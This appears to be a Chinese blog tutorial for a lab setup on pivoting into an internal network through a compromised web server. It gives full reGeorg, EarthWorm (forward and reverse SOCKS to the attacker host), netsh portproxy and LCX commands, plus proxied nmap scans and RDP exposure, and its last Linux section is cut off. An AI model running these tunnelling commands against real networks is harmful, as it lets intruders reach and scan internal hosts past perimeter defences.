reGeorg+proxychains代理链

kali:10.10.10.128
win7x64 1 :10.10.10.129、192.168.255.128
win7x64 2 :192.168.255.129
reGeorg利用了socks5协议建立隧道
下载地址:reGeorg
根据脚本类型上传:
访问:
reGeorg-1.png

python2 reGeorgSocksProxy.py -u http://10.10.10.129/tunnel.nosocket.php -p 1080

reGeorg-2.png

修改/etc/proxychains.conf配置如下:
reGeorg-3.png

这样一来就能请求到内网机器了:
reGeorg-4.png

端口扫描proxychains nmap -sT -Pn -p 80 192.168.255.129
reGeorg-5.png

不能使用nmap默认的扫描方式,不能使用-A -T4参数

EW(EarthWorm)结合proxychains代理链

官网:Earthworm
下载:Earthworm2

正向代理

代理机器设置:

如果是Linux系统
./ew_for_linux64 -s ssocksd -l 1080  #监听本地的1080端口
 
如果是Windows系统
ew_for_Win.exe -s ssocksd -l 1080   #监听本地的1080端口

攻击机设置:

如果是Linux系统,配置proxychains代理链的配置文件,将代理设置成 10.10.10.129的1080端口:socks5 10.10.10.129 1080 
然后命令前面加上 proxychains即可。如:proxychains curl 192.168.255.129
 
如果是Windows系统,直接浏览器中设置代理为 10.10.10.129的1080端口,或者利用  Proxifier 、sockscap64 设置全局代理

反向代理

反向代理需要先配置攻击端

WEB服务器设置:

如果是Linux系统:
./ew_linux_x64 -s rssocks -d 10.10.10.128 -e 8888  #将本机的流量全部转发到10.10.10.128的8888端口
 
如果是Windows系统:
ew_win32.exe -s rssocks -d 10.10.10.128 -e 8888  #将本机的流量全部转发到10.10.10.128的8888端口

攻击机设置:

如果是Linux系统:
./ew_linux_x64 -s rcsocks -l 1080 -e 8888  #将本机的8888端口的流量都转发给1080端口,这里8888端口只是用于传输流量
然后配置proxychains代理链的配置文件,将代理设置成 127.0.0.1的1080端口:socks5 127.0.0.1 1080 
然后命令前面加上 proxychains即可。如:proxychains curl 192.168.10.19
 
 
如果是Windows系统
ew_win32.exe -s rcsocks -l 1080 -e 8888   #将本机的8888端口的流量都转发给1080端口,这里8888端口只是用于传输流量
然后浏览器中设置代理为 100.100.10.12的1080端口,或者利用  Proxifier 、sockscap64 设置全局代理

Netsh实现端口转发

WEB服务器配置如下:

netsh interface portproxy add v4tov4 listenaddress=10.10.10.129 listenport=8888 connectaddress=192.168.255.129 connectport=80  #将10.10.10.129的8888端口与内网的192.168.255.129的80端口做映射
netsh interface portproxy show all  #查看映射列表
netsh interface portproxy delete v4tov4 listenaddress=10.10.10.129 listenport=8888 #删除映射

NetSH-1.png

最后外网机器访问WEB服务器公网ip的8888端口即可:
NetSH-2.png

其他端口转发同理,
如将内网的3389与WEB服务器公网的3333做映射:

netsh interface portproxy add v4tov4 listenaddress=10.10.10.129 listenport=3333 connectaddress=192.168.255.129 connectport=3389

远程连接10.10.10.129的3333端口即可:
NetSH-3.png

LCX

下载地址:LCX

lcx实现本地端口转发

windows:
将本地3333的流量转发到本地3389

lcx.exe -tran 3333 127.0.0.1 3389

linux:
将本地2222的流量转发到本地22:

./lcx -m 1 -p1 2222 -h2 127.0.0.1 -p2 22

连接3333:
LCX-4.png

远程连接2222端口:
LCX-5.png

远程端口转发

Windows:
将WEB服务器本地8888的流量转发的内网机器的80端口上
WEB服务器命令:

lcx.exe -tran 8888 192.168.255.129 80

LCX-1.png

然后访问WEB服务器公网的8888端口即可:
LCX-2.png

Linux:
攻击机:win 10.10.10.130
web kali:

Last modification:April 13th, 2020 at 10:39 am
如果觉得我的文章对你有用,请随意赞赏